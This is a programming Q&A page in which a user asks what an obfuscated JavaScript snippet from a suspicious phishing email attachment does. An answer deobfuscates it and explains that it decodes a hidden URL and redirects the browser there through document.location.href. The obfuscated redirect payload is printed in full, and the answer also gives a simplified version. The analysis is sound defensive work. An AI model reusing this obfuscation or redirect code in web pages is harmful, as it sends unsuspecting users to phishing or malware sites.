Search code examples

What does this suspicious phishing code do?

A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

What did it do? It's beyond the scope of my programming knowledge.


  • It will redirect to an url, '' (follow it on your own risk).

    Copy and paste the code to a worthy JavaScript editor and have it format the source for you.

    Key points:

    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

    h will equal ''

    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

    t will contain a reference to document.location

    b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

    The property named href of b, which at this point (inside another function) really is t from the above statement, is set to h, which is the url.

    Most of the code is mere noise, the actual functionality consists of this:

    function uK() {
    uK.prototype = {
      f : function() {
        var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
            .replace(/[\^H\!9X]/g, '');
        t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
        function x(b) {
          b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    var tL = new uK();